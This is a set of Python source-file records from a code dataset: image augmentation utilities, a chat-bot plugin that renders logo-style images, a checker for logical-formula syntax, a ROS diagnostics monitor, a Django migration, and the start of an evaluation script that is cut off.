0, 0, h, w\n\n i = random.randint(0, h - th)\n j = random.randint(0, w - tw)\n return i, j, th, tw\n\n def __call__(self, array):\n\n i, j, h, w = self.get_params(array, self.size)\n\n return array[i:i+h, j:j+w]\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0}, padding={1})'.format(self.size, self.padding)\n\n\nclass RandomHorizontalFlip(object):\n \"\"\"Horizontally flip the given np.array randomly with a given probability.\n\n Args:\n p (float): probability of the np.array being flipped. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, array):\n \"\"\"\n Args:\n array : np.array to be flipped.\n\n Returns:\n np.array: Randomly flipped np.array.\n \"\"\"\n if random.random() < self.p:\n for index in range(array.shape[1] // 2):\n tmp = array[:, index].copy()\n array[:, index] = array[:, array.shape[1] - index - 1]\n array[:, array.shape[1] - index - 1] = tmp\n\n return array\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nif __name__ == '__main__':\n\n import scipy.misc\n image = scipy.misc.imread(\"2007_000039.jpg\", mode=\"RGB\")\n resize_img = Resize(320)(image)\n cop_img = CenterCrop(300)(image)\n random_cop_img = RandomCrop(300)(image)\n flip_img = RandomHorizontalFlip(p=1.0)(image)\n\n print(image.shape)\n print(resize_img.shape)\n print(cop_img.shape)\n print(random_cop_img.shape)\n print(flip_img.shape)\n\n cv2.imshow(\"image\", image)\n cv2.imshow(\"resize_img\", resize_img)\n cv2.imshow(\"cop_img\", cop_img)\n cv2.imshow(\"random_cop_img\", random_cop_img)\n cv2.imshow(\"flip_img\", flip_img)\n cv2.waitKey(0)","sub_path":"tools/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":8644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46618815","text":"import re\nimport numpy as np\n\nfrom io import BytesIO\nfrom math import radians, tan\nfrom graia.saya import Saya, Channel\nfrom decimal import Decimal, ROUND_HALF_UP\nfrom PIL import Image as IMG, ImageDraw, ImageFont\nfrom graia.application import GraiaMiraiApplication\nfrom graia.application.message.chain import MessageChain\nfrom graia.saya.builtins.broadcast.schema import ListenerSchema\nfrom graia.application.event.messages import Group, GroupMessage\nfrom graia.application.message.elements.internal import Plain, Image\n\nfrom util.limit import manual_limit\nfrom config import yaml_data, 
group_data\nfrom util.RestControl import rest_control\nfrom util.UserBlock import black_list_block\n\n\ndef _round(f, r=ROUND_HALF_UP): return int(Decimal(str(f)).quantize(Decimal(\"0\"), rounding=r))\ndef rgb(r, g, b): return (r, g, b)\n\n\nLEFT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT = 2\nLEFT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH = 1 / 4\nRIGHT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT = 1\nRIGHT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH = 1 / 4\nRIGHT_PART_RADII = 10\nBG_COLOR = '#000000'\nBOX_COLOR = '#F7971D'\nLEFT_TEXT_COLOR = '#FFFFFF'\nRIGHT_TEXT_COLOR = '#000000'\nFONT_SIZE = 50\n\nsaya = Saya.current()\nchannel = Channel.current()\n\n\n@channel.use(ListenerSchema(listening_events=[GroupMessage],\n headless_decorators=[rest_control(), black_list_block()]))\nasync def abbreviated_prediction_handler(app: GraiaMiraiApplication, message: MessageChain, group: Group):\n msg = await StylePictureGeneraterHandler.handle(group, message)\n if msg:\n manual_limit(group.id, \"StylePictureGenerater\", 5)\n await app.sendGroupMessage(group, msg)\n\n\nclass StylePictureGeneraterHandler():\n \"\"\"\n 风格图片生成Handler\n \"\"\"\n\n @staticmethod\n async def handle(group, message):\n message_text = message.asDisplay()\n if re.match(\"5000兆 .* .*\", message_text):\n if yaml_data['Saya']['StyleLogoGenerator']['Disabled']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n elif 'StyleLogoGenerator' in group_data[group.id]['DisabledFunc']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n return await StylePictureGeneraterHandler.gosencho_en_hoshi_style_image_generator(message)\n elif re.match(\"ph .* .*\", message_text):\n if yaml_data['Saya']['StyleLogoGenerator']['Disabled']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n elif 'StyleLogoGenerator' in group_data[group.id]['DisabledFunc']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n return await StylePictureGeneraterHandler.pornhub_style_image_generator(message)\n elif re.match(\"yt .* .*\", message_text):\n if yaml_data['Saya']['StyleLogoGenerator']['Disabled']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n elif 'StyleLogoGenerator' in group_data[group.id]['DisabledFunc']:\n return MessageChain.create([Plain(f\"该功能暂不开启\")])\n return await StylePictureGeneraterHandler.youtube_style_image_generator(message)\n else:\n return None\n\n @staticmethod\n async def gosencho_en_hoshi_style_image_generator(message):\n try:\n _, left_text, right_text = message.asDisplay().split(\" \")\n try:\n img_byte = BytesIO()\n GoSenChoEnHoShiStyleUtils.genImage(word_a=left_text, word_b=right_text).save(img_byte, format='PNG')\n return MessageChain.create([Image.fromUnsafeBytes(img_byte.getvalue())])\n except TypeError:\n return MessageChain.create([Plain(text=\"不支持的内容!不要给我一些稀奇古怪的东西!\")])\n except ValueError:\n return MessageChain.create([Plain(text=\"参数非法!使用格式:5000兆 text1 text2\")])\n\n @staticmethod\n async def pornhub_style_image_generator(message):\n message_text = message.asDisplay()\n if '/' in message_text or '\\\\' in message_text:\n return MessageChain.create([Plain(text=\"不支持 '/' 与 '\\\\' !\")])\n try:\n _, left_text, right_text = message_text.split(\" \")\n except ValueError:\n return MessageChain.create([Plain(text=\"格式错误!使用方法:ph left right!\")])\n try:\n return await PornhubStyleUtils.make_ph_style_logo(left_text, right_text)\n except OSError as e:\n if \"[Errno 22] Invalid argument:\" in str(e):\n return MessageChain.create([Plain(text=\"非法字符!\")])\n\n @staticmethod\n async def youtube_style_image_generator(message):\n 
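        # Mirrors pornhub_style_image_generator: rejects '/' and '\\', expects the
        # message 'yt <left> <right>', and renders a YouTube-style logo through
        # YoutubeStyleUtils (white background, black left text, red rounded box
        # with white text on the right).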
message_text = message.asDisplay()\n if '/' in message_text or '\\\\' in message_text:\n return MessageChain.create([Plain(text=\"不支持 '/' 与 '\\\\' !\")])\n try:\n _, left_text, right_text = message_text.split(\" \")\n except ValueError:\n return MessageChain.create([Plain(text=\"格式错误!使用方法:yt left right!\")])\n try:\n return await YoutubeStyleUtils.make_yt_style_logo(left_text, right_text)\n except OSError as e:\n if \"[Errno 22] Invalid argument:\" in str(e):\n return MessageChain.create([Plain(text=\"非法字符!\")])\n\n\nclass GoSenChoEnHoShiStyleUtils:\n @staticmethod\n def get_gradient_2d(start, stop, width, height, is_horizontal=False):\n if is_horizontal:\n return np.tile(np.linspace(start, stop, width), (height, 1))\n else:\n return np.tile(np.linspace(start, stop, height), (width, 1)).T\n\n @staticmethod\n def getTextWidth(text, font, width=100, height=500, recursive=False):\n step = 100\n img = IMG.new(\"L\", (width, height))\n draw = ImageDraw.Draw(img)\n draw.text((0, 0), text, font=font, fill=255)\n box = img.getbbox()\n if box[2] < width - step or (recursive and box[2] == width - step):\n return box[2]\n else:\n return GoSenChoEnHoShiStyleUtils.getTextWidth(text=text, font=font, width=width + step, height=height,\n recursive=True)\n\n @staticmethod\n def get_gradient_3d(width, height, start_list, stop_list, is_horizontal_list=(False, False, False)):\n result = np.zeros((height, width, len(start_list)), dtype=float)\n for i, (start, stop, is_horizontal) in enumerate(zip(start_list, stop_list, is_horizontal_list)):\n result[:, :, i] = GoSenChoEnHoShiStyleUtils.get_gradient_2d(start, stop, width, height, is_horizontal)\n return result\n\n @staticmethod\n def createLinearGradient(steps, width, height):\n result = np.zeros((0, width, len(steps[0])), dtype=float)\n for i, k in enumerate(steps.keys()):\n if i == 0:\n continue\n pk = list(steps.keys())[i - 1]\n h = _round(height * (k - pk))\n array = GoSenChoEnHoShiStyleUtils.get_gradient_3d(width, h, steps[pk], steps[k])\n result = np.vstack([result, array])\n return result\n\n @staticmethod\n def genBaseImage(width=1500, height=150):\n downerSilverArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0.0: rgb(0, 15, 36),\n 0.10: rgb(255, 255, 255),\n 0.18: rgb(55, 58, 59),\n 0.25: rgb(55, 58, 59),\n 0.5: rgb(200, 200, 200),\n 0.75: rgb(55, 58, 59),\n 0.85: rgb(25, 20, 31),\n 0.91: rgb(240, 240, 240),\n 0.95: rgb(166, 175, 194),\n 1: rgb(50, 50, 50)\n }, width=width, height=height)\n goldArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(253, 241, 0),\n 0.25: rgb(245, 253, 187),\n 0.4: rgb(255, 255, 255),\n 0.75: rgb(253, 219, 9),\n 0.9: rgb(127, 53, 0),\n 1: rgb(243, 196, 11)\n }, width=width, height=height)\n redArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(230, 0, 0),\n 0.5: rgb(123, 0, 0),\n 0.51: rgb(240, 0, 0),\n 1: rgb(5, 0, 0)\n }, width=width, height=height)\n strokeRedArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(255, 100, 0),\n 0.5: rgb(123, 0, 0),\n 0.51: rgb(240, 0, 0),\n 1: rgb(5, 0, 0)\n }, width=width, height=height)\n silver2Array = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(245, 246, 248),\n 0.15: rgb(255, 255, 255),\n 0.35: rgb(195, 213, 220),\n 0.5: rgb(160, 190, 201),\n 0.51: rgb(160, 190, 201),\n 0.52: rgb(196, 215, 222),\n 1.0: rgb(255, 255, 255)\n }, width=width, height=height)\n navyArray = GoSenChoEnHoShiStyleUtils.createLinearGradient({\n 0: rgb(16, 25, 58),\n 0.03: rgb(255, 255, 255),\n 0.08: rgb(16, 25, 58),\n 0.2: rgb(16, 25, 58),\n 1: 
rgb(16, 25, 58)\n }, width=width, height=height)\n result = {\n \"downerSilver\": IMG.fromarray(np.uint8(downerSilverArray)).crop((0, 0, width, height)),\n \"gold\": IMG.fromarray(np.uint8(goldArray)).crop((0, 0, width, height)),\n \"red\": IMG.fromarray(np.uint8(redArray)).crop((0, 0, width, height)),\n \"strokeRed\": IMG.fromarray(np.uint8(strokeRedArray)).crop((0, 0, width, height)),\n \"silver2\": IMG.fromarray(np.uint8(silver2Array)).crop((0, 0, width, height)),\n \"strokeNavy\": IMG.fromarray(np.uint8(navyArray)).crop((0, 0, width, height)), # Width: 7\n \"baseStrokeBlack\": IMG.new(\"RGBA\", (width, height), rgb(0, 0, 0)).crop((0, 0, width, height)),\n # Width: 17\n \"strokeBlack\": IMG.new(\"RGBA\", (width, height), rgb(16, 25, 58)).crop((0, 0, width, height)), # Width: 17\n \"strokeWhite\": IMG.new(\"RGBA\", (width, height), rgb(221, 221, 221)).crop((0, 0, width, height)),\n # Width: 8\n \"baseStrokeWhite\": IMG.new(\"RGBA\", (width, height), rgb(255, 255, 255)).crop((0, 0, width, height))\n # Width: 8\n }\n for k in result.keys():\n result[k].putalpha(255)\n return result\n\n @staticmethod\n def genImage(word_a=\"5000兆円\", word_b=\"欲しい!\", default_width=1500, height=500,\n bg=\"white\", subset=250, default_base=None):\n # width = max_width\n alpha = (0, 0, 0, 0)\n leftmargin = 50\n font_upper = ImageFont.truetype(\"./saya/StyleLogoGenerator/ttf/STKAITI.TTF\", _round(height / 3))\n font_downer = ImageFont.truetype(\"./saya/StyleLogoGenerator/ttf/STKAITI.TTF\", _round(height / 3))\n\n # Prepare Width\n upper_width = max([default_width,\n GoSenChoEnHoShiStyleUtils.getTextWidth(word_a, font_upper, width=default_width,\n height=_round(height / 2))]) + 300\n downer_width = max([default_width,\n GoSenChoEnHoShiStyleUtils.getTextWidth(word_b, font_upper, width=default_width,\n height=_round(height / 2))]) + 300\n\n # Prepare base - Upper (if required)\n if default_width == upper_width:\n upper_base = default_base\n else:\n upper_base = GoSenChoEnHoShiStyleUtils.genBaseImage(width=upper_width, height=_round(height / 2))\n\n # Prepare base - Downer (if required)\n downer_base = GoSenChoEnHoShiStyleUtils.genBaseImage(width=downer_width + leftmargin, height=_round(height / 2))\n # if default_width == downer_width:\n # downer_base = default_base\n # else:\n\n # Prepare mask - Upper\n upper_mask_base = IMG.new(\"L\", (upper_width, _round(height / 2)), 0)\n\n mask_img_upper = list()\n upper_data = [\n [\n (4, 4), (4, 4), (0, 0), (0, 0), (0, 0), (0, 0), (0, 0)\n ], [\n 22, 20, 16, 10, 6, 6, 4, 0\n ], [\n \"baseStrokeBlack\",\n \"downerSilver\",\n \"baseStrokeBlack\",\n \"gold\",\n \"baseStrokeBlack\",\n \"baseStrokeWhite\",\n \"strokeRed\",\n \"red\",\n ]\n ]\n for pos, stroke, color in zip(upper_data[0], upper_data[1], upper_data[2]):\n mask_img_upper.append(upper_mask_base.copy())\n mask_draw_upper = ImageDraw.Draw(mask_img_upper[-1])\n mask_draw_upper.text((pos[0], pos[1]), word_a,\n font=font_upper, fill=255,\n stroke_width=_round(stroke * height / 500))\n\n # Prepare mask - Downer\n downer_mask_base = IMG.new(\"L\", (downer_width + leftmargin, _round(height / 2)), 0)\n mask_img_downer = list()\n downer_data = [\n [\n (5, 2), (5, 2), (0, 0), (0, 0), (0, 0), (0, -3)\n ], [\n 22, 19, 17, 8, 7, 0\n ], [\n \"baseStrokeBlack\",\n \"downerSilver\",\n \"strokeBlack\",\n \"strokeWhite\",\n \"strokeNavy\",\n \"silver2\"\n ]\n ]\n for pos, stroke, color in zip(downer_data[0], downer_data[1], downer_data[2]):\n mask_img_downer.append(downer_mask_base.copy())\n mask_draw_downer = 
ImageDraw.Draw(mask_img_downer[-1])\n            mask_draw_downer.text((pos[0] + leftmargin, pos[1]), word_b,\n                                  font=font_downer, fill=255,\n                                  stroke_width=_round(stroke * height / 500))\n\n        # Draw text - Upper\n        img_upper = IMG.new(\"RGBA\", (upper_width, _round(height / 2)), alpha)\n\n        for i, (pos, stroke, color) in enumerate(zip(upper_data[0], upper_data[1], upper_data[2])):\n            img_upper_part = IMG.new(\"RGBA\", (upper_width, _round(height / 2)), alpha)\n            img_upper_part.paste(upper_base[color], (0, 0), mask=mask_img_upper[i])\n            img_upper.alpha_composite(img_upper_part)\n\n        # Draw text - Downer\n        img_downer = IMG.new(\"RGBA\", (downer_width + leftmargin, _round(height / 2)), alpha)\n        for i, (pos, stroke, color) in enumerate(zip(downer_data[0], downer_data[1], downer_data[2])):\n            img_downer_part = IMG.new(\"RGBA\", (downer_width + leftmargin, _round(height / 2)), alpha)\n            img_downer_part.paste(downer_base[color], (0, 0), mask=mask_img_downer[i])\n            img_downer.alpha_composite(img_downer_part)\n\n        # tilt image\n        tiltres = list()\n        angle = 20\n        for img in [img_upper, img_downer]:\n            dist = img.height * tan(radians(angle))\n            data = (1, tan(radians(angle)), -dist, 0, 1, 0)\n            imgc = img.crop((0, 0, img.width + dist, img.height))\n            imgt = imgc.transform(imgc.size, IMG.AFFINE, data, IMG.BILINEAR)\n            tiltres.append(imgt)\n\n        # finish\n        previmg = IMG.new(\"RGBA\", (max([upper_width, downer_width]) + leftmargin + 300 + 100, height + 100),\n                          (255, 255, 255, 0))\n        previmg.alpha_composite(tiltres[0], (0, 50), (0, 0))\n        previmg.alpha_composite(tiltres[1], (subset, _round(height / 2) + 50), (0, 0))\n        croprange = previmg.getbbox()\n        img = previmg.crop(croprange)\n        final_image = IMG.new(\"RGB\", (img.size[0] + 100, img.size[1] + 100), bg)\n        final_image.paste(img, (50, 50))\n\n        return final_image\n\n\nclass PornhubStyleUtils:\n    @staticmethod\n    async def create_left_part_img(text: str, font_size: int):\n        font = ImageFont.truetype('./saya/StyleLogoGenerator/ttf/ArialEnUnicodeBold.ttf', font_size)\n        font_width, font_height = font.getsize(text)\n        offset_y = font.font.getsize(text)[1][1]\n        blank_height = font_height * LEFT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT\n        right_blank = int(font_width / len(text) * LEFT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH)\n        img_height = font_height + offset_y + blank_height * 2\n        image_width = font_width + right_blank\n        image_size = image_width, img_height\n        image = IMG.new('RGBA', image_size, BG_COLOR)\n        draw = ImageDraw.Draw(image)\n        draw.text((0, blank_height), text, fill=LEFT_TEXT_COLOR, font=font)\n        return image\n\n    @staticmethod\n    async def create_right_part_img(text: str, font_size: int):\n        radii = RIGHT_PART_RADII\n        font = ImageFont.truetype('./saya/StyleLogoGenerator/ttf/ArialEnUnicodeBold.ttf', font_size)\n        font_width, font_height = font.getsize(text)\n        offset_y = font.font.getsize(text)[1][1]\n        blank_height = font_height * RIGHT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT\n        left_blank = int(font_width / len(text) * RIGHT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH)\n        image_width = font_width + 2 * left_blank\n        image_height = font_height + offset_y + blank_height * 2\n        image = IMG.new('RGBA', (image_width, image_height), BOX_COLOR)\n        draw = ImageDraw.Draw(image)\n        draw.text((left_blank, blank_height), text, fill=RIGHT_TEXT_COLOR, font=font)\n\n        # rounded corners via a circle mask\n        magnify_time = 10\n        magnified_radii = radii * magnify_time\n        circle = IMG.new('L', (magnified_radii * 2, magnified_radii * 2), 0)  # create a canvas with a black background\n        draw = ImageDraw.Draw(circle)\n        draw.ellipse((0, 0, magnified_radii * 2, magnified_radii * 2), 
fill=255)  # draw a white circle\n\n        # paste the 4 corners (splitting the full circle into 4 quadrants)\n        magnified_alpha_width = image_width * magnify_time\n        magnified_alpha_height = image_height * magnify_time\n        alpha = IMG.new('L', (magnified_alpha_width, magnified_alpha_height), 255)\n        alpha.paste(circle.crop((0, 0, magnified_radii, magnified_radii)), (0, 0))  # top-left corner\n        alpha.paste(circle.crop((magnified_radii, 0, magnified_radii * 2, magnified_radii)),\n                    (magnified_alpha_width - magnified_radii, 0))  # top-right corner\n        alpha.paste(circle.crop((magnified_radii, magnified_radii, magnified_radii * 2, magnified_radii * 2)),\n                    (magnified_alpha_width - magnified_radii, magnified_alpha_height - magnified_radii))  # bottom-right corner\n        alpha.paste(circle.crop((0, magnified_radii, magnified_radii, magnified_radii * 2)),\n                    (0, magnified_alpha_height - magnified_radii))  # bottom-left corner\n        alpha = alpha.resize((image_width, image_height), IMG.ANTIALIAS)\n        image.putalpha(alpha)\n        return image\n\n    @staticmethod\n    async def combine_img(left_text: str, right_text, font_size: int) -> bytes:\n        left_img = await PornhubStyleUtils.create_left_part_img(left_text, font_size)\n        right_img = await PornhubStyleUtils.create_right_part_img(right_text, font_size)\n        blank = 30\n        bg_img_width = left_img.width + right_img.width + blank * 2\n        bg_img_height = left_img.height\n        bg_img = IMG.new('RGBA', (bg_img_width, bg_img_height), BG_COLOR)\n        bg_img.paste(left_img, (blank, 0))\n        bg_img.paste(right_img, (blank + left_img.width, int((bg_img_height - right_img.height) / 2)), mask=right_img)\n        byte_io = BytesIO()\n        bg_img.save(byte_io, format=\"PNG\")\n        return byte_io.getvalue()\n\n    @staticmethod\n    async def make_ph_style_logo(left_text: str, right_text: str) -> MessageChain:\n        return MessageChain.create([\n            Image.fromUnsafeBytes(await PornhubStyleUtils.combine_img(left_text, right_text, FONT_SIZE))\n        ])\n\n\nclass YoutubeStyleUtils:\n    BG_COLOR = \"#FFFFFF\"\n    BOX_COLOR = \"#FF0000\"\n    LEFT_TEXT_COLOR = \"#000000\"\n    RIGHT_TEXT_COLOR = \"#FFFFFF\"\n\n    @staticmethod\n    async def create_left_part_img(text: str, font_size: int):\n        font = ImageFont.truetype('./saya/StyleLogoGenerator/ttf/ArialEnUnicodeBold.ttf', font_size)\n        font_width, font_height = font.getsize(text)\n        offset_y = font.font.getsize(text)[1][1]\n        blank_height = font_height * LEFT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT\n        right_blank = int(font_width / len(text) * LEFT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH)\n        img_height = font_height + offset_y + blank_height * 2\n        image_width = font_width + right_blank\n        image_size = image_width, img_height\n        image = IMG.new('RGBA', image_size, YoutubeStyleUtils.BG_COLOR)\n        draw = ImageDraw.Draw(image)\n        draw.text((0, blank_height), text, fill=YoutubeStyleUtils.LEFT_TEXT_COLOR, font=font)\n        return image\n\n    @staticmethod\n    async def create_right_part_img(text: str, font_size: int):\n        radii = RIGHT_PART_RADII\n        font = ImageFont.truetype('./saya/StyleLogoGenerator/ttf/ArialEnUnicodeBold.ttf', font_size)\n        font_width, font_height = font.getsize(text)\n        offset_y = font.font.getsize(text)[1][1]\n        blank_height = font_height * RIGHT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT\n        left_blank = int(font_width / len(text) * RIGHT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH)\n        image_width = font_width + 2 * left_blank\n        image_height = font_height + offset_y + blank_height * 2\n        image = IMG.new('RGBA', (image_width, image_height), YoutubeStyleUtils.BOX_COLOR)\n        draw = ImageDraw.Draw(image)\n        draw.text((left_blank, blank_height), text, fill=YoutubeStyleUtils.RIGHT_TEXT_COLOR, font=font)\n\n        # rounded corners via a circle mask\n        magnify_time = 10\n        magnified_radii = radii * magnify_time\n        circle = IMG.new('L', (magnified_radii * 2, magnified_radii * 2), 0)  # fully black (0) canvas so the cropped corners stay transparent\n        draw = ImageDraw.Draw(circle)\n        draw.ellipse((0, 0, magnified_radii * 2, magnified_radii * 2), fill=255)  # draw a white circle\n\n        # paste the 4 corners (splitting the full circle into 4 quadrants)\n        magnified_alpha_width = image_width * magnify_time\n        magnified_alpha_height = image_height * magnify_time\n        alpha = IMG.new('L', (magnified_alpha_width, magnified_alpha_height), 255)\n        alpha.paste(circle.crop((0, 0, magnified_radii, magnified_radii)), (0, 0))  # top-left corner\n        alpha.paste(circle.crop((magnified_radii, 0, magnified_radii * 2, magnified_radii)),\n                    (magnified_alpha_width - magnified_radii, 0))  # top-right corner\n        alpha.paste(circle.crop((magnified_radii, magnified_radii, magnified_radii * 2, magnified_radii * 2)),\n                    (magnified_alpha_width - magnified_radii, magnified_alpha_height - magnified_radii))  # bottom-right corner\n        alpha.paste(circle.crop((0, magnified_radii, magnified_radii, magnified_radii * 2)),\n                    (0, magnified_alpha_height - magnified_radii))  # bottom-left corner\n        alpha = alpha.resize((image_width, image_height), IMG.ANTIALIAS)\n        image.putalpha(alpha)\n        return image\n\n    @staticmethod\n    async def combine_img(left_text: str, right_text, font_size: int) -> bytes:\n        left_img = await YoutubeStyleUtils.create_left_part_img(left_text, font_size)\n        right_img = await YoutubeStyleUtils.create_right_part_img(right_text, font_size)\n        blank = 30\n        bg_img_width = left_img.width + right_img.width + blank * 2\n        bg_img_height = left_img.height\n        bg_img = IMG.new('RGBA', (bg_img_width, bg_img_height), YoutubeStyleUtils.BG_COLOR)\n        bg_img.paste(left_img, (blank, 0))\n        bg_img.paste(right_img, (blank + left_img.width, int((bg_img_height - right_img.height) / 2)), mask=right_img)\n        byte_io = BytesIO()\n        bg_img.save(byte_io, format=\"PNG\")\n        return byte_io.getvalue()\n\n    @staticmethod\n    async def make_yt_style_logo(left_text: str, right_text: str) -> MessageChain:\n        return MessageChain.create([\n            Image.fromUnsafeBytes(await YoutubeStyleUtils.combine_img(left_text, right_text, FONT_SIZE))\n        ])\n
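\n\n# --- Illustrative usage sketch (editor's addition, not part of the original plugin):\n# once the TTF files under ./saya/StyleLogoGenerator/ttf/ are present, the generators\n# above are plain PIL and can be exercised outside the bot, e.g.:\n#\n#     import asyncio\n#     png_bytes = asyncio.get_event_loop().run_until_complete(\n#         PornhubStyleUtils.combine_img('Porn', 'hub', 100))  # 100 stands in for FONT_SIZE\n#     with open('logo.png', 'wb') as fh:\n#         fh.write(png_bytes)\n#\n# Design note: the rounded-corner mask is drawn at 10x size (magnify_time) and shrunk\n# with ANTIALIAS - a simple supersampling trick that smooths PIL's aliased ellipse.\n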
","sub_path":"saya/StyleLogoGenerator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":23970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"266874412","text":"import string\n\nform = input()\n\nvar = string.ascii_letters\noperators = \"|&\"\nparents_open = \"([{\"\nparents_close = \")]}\"\n\np_o = [0, 0, 0]\np_c = [0, 0, 0]\n\ndef isVar(char):\n    if char is None:\n        return False\n    elif (char in var):\n        return True\n    else:\n        return False\n\ndef isElement(char):\n    return isVar(char) or isOperator(char) or isParent(char)\n\ndef isOperator(char):\n    if char is None:\n        return False\n    if (char in operators):\n        return True\n    else:\n        return False\n    \ndef checkParents():\n    i = 0\n    while (i < 3):\n        if p_o[i] < p_c[i]: return False\n        i = i + 1\n    return True\n\ndef checkComp():\n    i = 0\n    while (i < 3):\n        if p_o[i] != p_c[i]: return False\n        i = i + 1\n    return True\n\ndef whichParent(char):\n    i = 0\n    while(i < 3):\n        if parents_open[i] == char:\n            p_o[i] += 1\n        elif parents_close[i] == char:\n            p_c[i] += 1\n        i = i + 1\n    return checkParents()\n\ndef isParent(char):\n    if char in parents_open:\n        return True\n    if char in parents_close:\n        return True\n    else:\n        return False\n\ndef checkOperatorNeigberhood(position):\n    if isOperator(form[position-1]):\n        return False\n    if isOperator(form[position+1]):\n        return False\n    else:\n        return True\n\ndef checkVarNeigberhood(position):\n    if position-1 < 0 and position+1 >= len(form):\n        return True\n    if position-1 < 0:\n        
return not(isVar(form[position+1]))\n if position+1 >= len(form): \n return not(isVar(form[position-1]))\n else: return not(isVar(form[position-1]) or isVar(form[position+1]))\n\ndef check(form):\n correct = True\n i = 0\n while i < len(form) and correct:\n if isVar(form[i]): correct = checkVarNeigberhood(i)\n if isOperator(form[i]): correct = checkOperatorNeigberhood(i)\n if isParent(form[i]): correct = whichParent(form[i])\n if not(isElement(form[i])): correct = False\n i = i + 1\n correct = checkComp()\n return correct\n\nprint(check(form))\n","sub_path":"Lab2/logical.py","file_name":"logical.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615269255","text":"#!/usr/bin/env python\n\nimport threading\nimport mutex\nimport rospy\nfrom diagnostic_msgs.msg import DiagnosticArray\n\n\nclass ServiceWrapper(object):\n def __init__(self, service_name=None, service_type=None):\n self.name = service_name\n self.type = service_type\n self.client = None\n\n def generate_diagnostics(self):\n resp = self.client.call() # do I need a try catch here?\n status_msg = self.diagnostics_from_response(resp)\n return status_msg\n\n # Every derived class needs to override this\n def diagnostics_from_response(self, response):\n msg = DiagnosticArray()\n return msg\n\n\nclass MonitorManager(object):\n def __init__(self):\n loop_rate_hz = 1\n rate = rospy.Rate(loop_rate_hz)\n\n self._pub_diag = rospy.Publisher(\n 'diagnostics', DiagnosticArray, queue_size=10)\n self._services = []\n self._ser_lock = threading.Lock()\n self._thread = threading.Thread(\n target=self.call_all, args=(rate,))\n self._thread.daemon = True\n\n # wrong service not caught properly\n # ERROR (in case of wrong type): thread.error: release unlocked lock\n def register_service(self, service):\n try:\n rospy.wait_for_service(service.name, timeout=1.0)\n service.client = rospy.ServiceProxy(service.name, service.type)\n self._ser_lock.acquire()\n self._services.append(service)\n print(\"Service '\" + service.name +\n \"' added of type\" + str(service.type))\n except rospy.ServiceException as exc:\n print(\"Service did not process request: \" + str(exc))\n finally:\n self._ser_lock.release()\n\n def call_all(self, rate):\n seq = 1\n while not rospy.is_shutdown():\n diag_msg = DiagnosticArray()\n diag_msg.header.stamp = rospy.get_rostime()\n\n self._ser_lock.acquire()\n for service in self._services:\n status_msg = service.generate_diagnostics()\n diag_msg.status.extend(status_msg)\n\n self._pub_diag.publish(diag_msg)\n self._ser_lock.release()\n seq += 1\n rate.sleep()\n\n def loop(self):\n self._thread.start()\n","sub_path":"src/rosgraph_monitor/monitor_manager.py","file_name":"monitor_manager.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637188573","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Calendar',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50, verbose_name='name')),\n ('slug', models.SlugField(verbose_name='slug')),\n ],\n options={\n 'ordering': ['name'],\n 'verbose_name': 'calendar',\n },\n bases=(models.Model,),\n ),\n 
migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100, verbose_name='title')),\n ('start', models.DateTimeField(verbose_name='start')),\n ('end', models.DateTimeField(verbose_name='end')),\n ('comment', models.TextField(null=True)),\n ('calendar', models.ForeignKey(to='Calendar.Calendar')),\n ],\n options={\n 'ordering': ['start', 'end'],\n 'verbose_name': 'event',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"Calendar/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406026670","text":"#this script takes as input a file containing a list of uniprot IDs and their respective e-value after bonferroni correction, and uses each of these e-values to \n#compute a confusion matrix, the accuracy, Matthews correlation coefficient, true positive ratio and false positive ratio\n\nimport sys\nfrom math import sqrt\n\noutput_file = open(\"cm_performance_output.txt\", 